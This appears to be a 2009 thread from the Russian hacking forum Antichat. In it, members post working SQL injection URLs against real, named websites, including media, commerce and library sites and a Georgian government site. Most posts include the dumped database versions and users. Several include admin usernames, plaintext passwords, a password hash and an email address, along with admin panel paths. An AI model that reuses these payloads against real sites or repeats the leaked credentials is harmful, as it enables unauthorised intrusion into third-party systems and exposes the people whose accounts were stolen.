ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8951  
Старый 21.04.2009, 04:47
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Ещё одна слепая скуля на хакере =)
http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+1=1--

----добавка---
http://xakep.ru/common/vote3/vote_results.asp?site=SVT5'+and+77=ascii(substring (@@version,1,1))--

вот так - с запросом, чтобы не писали, в репу, что мол не скуля там. Скуля-скуля, ка и описал выше - блинд

Последний раз редактировалось o3,14um; 21.04.2009 в 06:41..
 
Ответить с цитированием

  #8952  
Старый 21.04.2009, 06:38
KosoyRoman
Познающий
Регистрация: 14.09.2008
Сообщений: 38
Провел на форуме:
162695

Репутация: 37
По умолчанию

http://top.zenon.net/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.biz.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.cooking.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.travel.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.magelan.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.anekdot.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://www.toptop.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.lgg.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.auto.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.rosmebel.com/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8

Последний раз редактировалось jokester; 21.04.2009 в 10:41.. Причина: убрал дубли
 
Ответить с цитированием

  #8953  
Старый 21.04.2009, 12:41
Bilyak
Новичок
Регистрация: 14.07.2008
Сообщений: 11
Провел на форуме:
263330

Репутация: 8
Отправить сообщение для Bilyak с помощью ICQ
По умолчанию

PostgreSQL 8.1.3 on i386-portbld-freebsd5.4, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728



Цитата:
http://www.mediat.com.ua/ann.php?type=9999+union+select+null,null,null,tabl e_name,null,null+FROM+INFORMATION_SCHEMA.TABLES--#2618
Цитата:
http://www.mediat.com.ua/ann.php?type=9999+union+select+null,null,null,usen ame,passwd,null+FROM+pg_user--#2618
 
Ответить с цитированием

  #8954  
Старый 21.04.2009, 13:05
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Alexa Rank:31,715

Цитата:
http://squakenet.com/computer_games/download.asp?game=-4869+union+select+version(),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19/*&title=Bundesliga-Manager-Professional
Version: 4.0.20a-nt
User: squakenet@localhost
Dbname: squakenet
 
Ответить с цитированием

  #8955  
Старый 21.04.2009, 13:41
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Большая Экономическая библиотека>>
Код:
http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,0,1,2,3,4--+
5.0.27*:*economics*:*usmdi@localhost*:*redhat-linux-gnu
table: xmb_members
db: corporation
log: Admin
pass: 86b7c7f6dd33661e19a89cf6b1253197 ):
+limit+x,x--+

tables where: like+'password'--+
Код:
http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+table_name,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.columns+where+column_name+like+'password'+limit+0,1--+

Последний раз редактировалось farex; 21.04.2009 в 13:45..
 
Ответить с цитированием

  #8956  
Старый 21.04.2009, 14:54
hitt 1g
Новичок
Регистрация: 14.04.2009
Сообщений: 6
Провел на форуме:
71588

Репутация: 44
По умолчанию

Цитата:
http://www.wanderlust.co.uk/event.php?event_id=341+and+1=0+union+select+1,conc at_ws(0x3a,admin_username,admin_password,admin_ema il),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+from+admin_users--
DB Version: 5.0.27-log
DB Name: wanderlustlive
DB User: wanderlustlive@localhost

Admin data: ellion:zak2bRaP:danny.callaghan@wanderlust.co.uk

PR: 6

Цитата:
http://www.fnv.is/index.php?pid=69&cid=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),user(),database()),.8,9,10,11,12,13,14--
DB Version: 4.0.20a-nt
DB Name: fnv
DB User: smali@localhost

PR: 6

Цитата:
http://www.michaelstewart.co.uk/index.php?page_id=brand&brandid=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6,7,8,9,10,11,12+from+STAFF+limit+1,1--
DB Version: 5.0.67-community
DB Name: michael_michaelstewart
DB User: michael_kanx197@localhost

Admin data: Admin: DBAdmin / Marco:Monteiro

PR: 6

Цитата:
http://www.runningroom.com/hm/inside.php?id=1+and+1=0+union+select+concat_ws(0x3 a,database(),user(),version()),2--
DB Version: 4.1.22-standard-log
DB Name: rr_main
DB User: rrweb_user@runningroomcanada.com

PR: 6
 
Ответить с цитированием

  #8957  
Старый 21.04.2009, 15:32
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

http://web-well.ru/ptype?view=-3+union+select+1,2--

Version: 5.0.22
Тиц 20
 
Ответить с цитированием

  #8958  
Старый 21.04.2009, 15:50
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.rs.kljb.de/display.php?idcnt=58&idver=-155+union+select+1,2,3/*

Database Version: 4.1.24
Database name: usrdb_kljduqls
User name: kljduqls@localhost
 
Ответить с цитированием

  #8959  
Старый 21.04.2009, 19:05
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<"Дарья Данцова"Официальный сайт>>
Код:
http://www.dontsova.ru/view_press.php?id=-38'+union+select+1,2,3,4,5,concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),7,8,9,0,1,2,3--+
4.0.21-standard-log*:*www_dontsova_ru*:*dontsova_ru_db@192.168.0.1 *:*unknown-linux
Код:
http://www.dontsova.ru/site_admin
-------------------------------------------
-=\|sql-blind|/=-
<<студия Интернет рекламы>>
Код:
http://12kb.ru/one_article.php?id=99999+and+ascii(substring(version(),1,1))=53--+
Код:
http://12kb.ru/admin/

Последний раз редактировалось farex; 21.04.2009 в 20:06..
 
Ответить с цитированием

  #8960  
Старый 21.04.2009, 23:57
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Скуля на http://www.eu-integration.gov.ge

Список таблиц.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(table_name+as+ binary)+from+information_schema.tables+--+

Поля таблицы user.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(column_name+as +binary)+from+information_schema.columns+where+tab le_name=0x75736572+--+

Список пользователей-паролей.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,concat_ws(0x3a,cast (username+as+binary),cast(password+as+binary))+fro m+user+--+

Версия БД: 5.0.77
Ось: portbld-freebsd6.3
Имя БД: euinteg_euinteg
Рабочая папка БД: /var/db/mysql/
Пользователь БД: euinteg_euint@localhost

Прав на чтения файлов нет, доступа к mysql.user нет.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ